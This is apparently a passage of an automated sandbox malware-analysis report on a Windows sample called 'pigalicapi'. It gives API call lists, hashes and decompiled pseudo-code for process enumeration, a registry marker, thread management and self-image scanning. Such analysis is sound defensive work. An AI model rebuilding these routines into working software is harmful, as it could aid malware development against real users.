                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001D2E
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001E37
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                                          • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                          • Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005F30() {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				signed int _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				int _v328;
                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_t27 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_v8 = _t27;
                                                                                                                                                                                                                                                                          				E04007D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                          				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                          				_t30 =  *0x4011898; // 0x4013fe2
                                                                                                                                                                                                                                                                          				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                          					_v292 = 0x20;
                                                                                                                                                                                                                                                                          					_v288 = 0x20;
                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_v328 = 0x10;
                                                                                                                                                                                                                                                                          						E04009BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v20);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04005f39
                                                                                                                                                                                                                                                                          0x04005f3d
                                                                                                                                                                                                                                                                          0x04005f42
                                                                                                                                                                                                                                                                          0x04005f53
                                                                                                                                                                                                                                                                          0x04005f67
                                                                                                                                                                                                                                                                          0x04005f6d
                                                                                                                                                                                                                                                                          0x04005f7a
                                                                                                                                                                                                                                                                          0x04005f80
                                                                                                                                                                                                                                                                          0x04005f90
                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                          0x04005f99
                                                                                                                                                                                                                                                                          0x04005fbb
                                                                                                                                                                                                                                                                          0x04005fc1
                                                                                                                                                                                                                                                                          0x04005fcb
                                                                                                                                                                                                                                                                          0x04005ff2
                                                                                                                                                                                                                                                                          0x04005ffa
                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                          0x04006000
                                                                                                                                                                                                                                                                          0x04006006
                                                                                                                                                                                                                                                                          0x04006008
                                                                                                                                                                                                                                                                          0x0400601b
                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                          0x04006051

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                          • Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                          • Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04004096() {
                                                                                                                                                                                                                                                                          				void _t92;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				L0:
                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                          					L0:
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                          					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                          					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                          					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                          						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                          						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                          						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                          						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                          						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                          					E040097C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                          					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L22:
                                                                                                                                                                                                                                                                          				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                          0x040040a5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040040ab
                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x04004273
                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x040042a2
                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042cd
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                                          • Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                          • Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04004510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                          				void* _v784;
                                                                                                                                                                                                                                                                          				char _v1308;
                                                                                                                                                                                                                                                                          				long _v1312;
                                                                                                                                                                                                                                                                          				void* _v1316;
                                                                                                                                                                                                                                                                          				long _v1320;
                                                                                                                                                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                                                                                                                                                          				intOrPtr _v1328;
                                                                                                                                                                                                                                                                          				signed int _v1332;
                                                                                                                                                                                                                                                                          				intOrPtr _v1336;
                                                                                                                                                                                                                                                                          				intOrPtr _v1340;
                                                                                                                                                                                                                                                                          				intOrPtr _v1344;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                          				signed char _t101;
                                                                                                                                                                                                                                                                          				signed char _t114;
                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                          					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                          					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v784 = _t90;
                                                                                                                                                                                                                                                                          					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                          					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                                                          						if(_v784 != 0) {
                                                                                                                                                                                                                                                                          							CloseHandle(_v784);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v1316 = _t94;
                                                                                                                                                                                                                                                                          					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1320 = 0;
                                                                                                                                                                                                                                                                          					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                                                                          						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                          							_v1316 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                          						_v784 = 0;
                                                                                                                                                                                                                                                                          						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                          						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                          						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v1316 = 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          							_v1332 = 0;
                                                                                                                                                                                                                                                                          							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1340 = _v1344;
                                                                                                                                                                                                                                                                          								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                          								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                          								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v5 = 1;
                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x0400451a
                                                                                                                                                                                                                                                                          0x04004522
                                                                                                                                                                                                                                                                          0x040047e6
                                                                                                                                                                                                                                                                          0x040047ed
                                                                                                                                                                                                                                                                          0x04004532
                                                                                                                                                                                                                                                                          0x04004556
                                                                                                                                                                                                                                                                          0x0400455b
                                                                                                                                                                                                                                                                          0x0400456c
                                                                                                                                                                                                                                                                          0x0400458b
                                                                                                                                                                                                                                                                          0x04004591
                                                                                                                                                                                                                                                                          0x0400459e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
